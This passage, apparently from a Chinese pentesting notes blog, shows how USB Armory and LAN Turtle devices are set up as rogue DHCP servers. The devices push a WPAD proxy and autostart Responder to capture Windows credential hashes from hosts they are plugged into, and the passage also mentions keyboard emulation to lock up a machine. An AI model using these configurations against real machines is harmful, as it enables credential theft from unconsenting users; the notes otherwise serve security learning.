<h1 id="A-slightly-different-configuration-for-an-internal-subnet"><a href="#A-slightly-different-configuration-for-an-internal-subnet" class="headerlink" title="A slightly different configuration for an internal subnet."></a>A slightly different configuration for an internal subnet.</h1><p>subnet 192.168.2.0 netmask 255.255.255.0 {<br>range 192.168.2.1 192.168.2.2;<br>option routers 192.168.2.201;<br>option local-proxy-config “<a href="http://192.168.2.201/wpad.dat&quot;" target="_blank" rel="noopener">http://192.168.2.201/wpad.dat&quot;</a>;<br>}<br>（3）设置自动运行，编辑rc.local文件<br>/etc/rc.local</p>
<p>#!/bin/sh -e</p>
<h1 id="Clear-leases"><a href="#Clear-leases" class="headerlink" title="Clear leases"></a>Clear leases</h1><p>rm -f /var/lib/dhcp/dhcpd.leases<br>touch /var/lib/dhcp/dhcpd.leases</p>
<h1 id="Start-DHCP-server"><a href="#Start-DHCP-server" class="headerlink" title="Start DHCP server"></a>Start DHCP server</h1><p>/usr/sbin/dhcpd</p>
<h1 id="Start-Responder"><a href="#Start-Responder" class="headerlink" title="Start Responder"></a>Start Responder</h1><p>/usr/bin/screen -dmS responder bash -c ‘cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F’<br>exit 0<br>（4）添加一个a .screenrc文件，让屏幕会话的日志记录启用，然后重启usbarmory。<br>/root/.screenrc</p>
<h1 id="Logging"><a href="#Logging" class="headerlink" title="Logging"></a>Logging</h1><p>deflog on<br>logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log</p>
<p>注意：指令调用responder的位置与你自己的存放位置要一致。<br>4)遇到的问题<br>（1）usb可以模拟成键盘鼠标，具体文件在github上有说明可使主机瘫痪（比如设置一直摁住任务管理器的三个组合键并循环）<br>（2）由于本身不是网卡，当配置成dhcp时，windowsxp，windows98，windows8，windows10等系统无法识别，必须下载特定驱动，仅windows7可以识别。<br>2.lanturtle<br>1)安装软件<br>responder安装同上。安装必备软件同上。<br>2)配置文件<br>（1）编辑DHCP配置<br>位置：/etc/dhcp/dhcpd.conf<br>添加语句<br>option local-proxy-config “<a href="http://192.168.2.201/wpad.dat&quot;" target="_blank" rel="noopener">http://192.168.2.201/wpad.dat&quot;</a>;<br>（2）编辑调用responder，创建文件/etc/rc.local<br>rm -rf /overlay/etc/turtle/Responder/logs注意文件位置<br>/overlay/etc/rc.local文件略有不同<br>/overlay/etc/rc.local<br>/etc/init.d/dnsmasq stop</p>
<h1 id="Start-DHCP-server-1"><a href="#Start-DHCP-server-1" class="headerlink" title="Start DHCP server"></a>Start DHCP server</h1><p>/usr/sbin/dhcpd</p>
<h1 id="Start-Responder-1"><a href="#Start-Responder-1" class="headerlink" title="Start Responder"></a>Start Responder</h1><p>/usr/bin/screen -dmS responder bash -c ‘cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F’<br>exit 0<br>（3）为了让屏幕会话的日志记录启用(可以让你迅速找出问题),你需要添加一个a .screenrc文件。最重要的部分是:<br>/root/.screenrc</p>
<h1 id="Logging-1"><a href="#Logging-1" class="headerlink" title="Logging"></a>Logging</h1><p>deflog on<br>logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log<br>3)遇到的问题<br>抓取哈希成功率较低，理论上每台机器只能通过这种方式获取一次哈希。</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/哈希/" rel="tag"># 哈希</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/12/新的文章/" rel="prev" title="新的文章">
                新的文章 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/background.jpg" alt="baige jiang">
            
              <p class="site-author-name" itemprop="name">baige jiang</p>
              <p class="site-description motion-element" itemprop="description">Record learning notes at any time</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">11</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">7</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">16</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/jiangbaige" title="GitHub &rarr; https://github.com/jiangbaige" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="mailto:719188428@qq.com" title="E-Mail &rarr; mailto:719188428@qq.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#interfaces-5-file-used-by-ifup-8-and-ifdown-8"><span class="nav-number">1.</span> <span class="nav-text">interfaces(5) file used by ifup(8) and ifdown(8)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Include-files-from-etc-network-interfaces-d"><span class="nav-number">2.</span> <span class="nav-text">Include files from /etc/network/interfaces.d:</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#If-this-DHCP-server-is-the-official-DHCP-server-for-the-local"><span class="nav-number">3.</span> <span class="nav-text">If this DHCP server is the official DHCP server for the local</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#network-the-authoritative-directive-should-be-uncommented"><span class="nav-number">4.</span> <span class="nav-text">network, the authoritative directive should be uncommented.</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Use-this-to-send-dhcp-log-messages-to-a-different-log-file-you-also"><span class="nav-number">5.</span> <span class="nav-text">Use this to send dhcp log messages to a different log file (you also</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#have-to-hack-syslog-conf-to-complete-the-redirection"><span class="nav-number">6.</span> <span class="nav-text">have to hack syslog.conf to complete the redirection).</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#wpad"><span class="nav-number">7.</span> <span class="nav-text">wpad</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#A-slightly-different-configuration-for-an-internal-subnet"><span class="nav-number">8.</span> <span class="nav-text">A slightly different configuration for an internal subnet.</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Clear-leases"><span class="nav-number">9.</span> <span class="nav-text">Clear leases</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Start-DHCP-server"><span class="nav-number">10.</span> <span class="nav-text">Start DHCP server</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Start-Responder"><span class="nav-number">11.</span> <span class="nav-text">Start Responder</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Logging"><span class="nav-number">12.</span> <span class="nav-text">Logging</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Start-DHCP-server-1"><span class="nav-number">13.</span> <span class="nav-text">Start DHCP server</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Start-Responder-1"><span class="nav-number">14.</span> <span class="nav-text">Start Responder</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Logging-1"><span class="nav-number">15.</span> <span class="nav-text">Logging</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">baige jiang</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.0.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=7.0.0"></script>

  <script src="/js/src/motion.js?v=7.0.0"></script>



  
  


  <script src="/js/src/schemes/muse.js?v=7.0.0"></script>



  
  <script src="/js/src/scrollspy.js?v=7.0.0"></script>
<script src="/js/src/post-details.js?v=7.0.0"></script>



  


  <script src="/js/src/bootstrap.js?v=7.0.0"></script>



  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
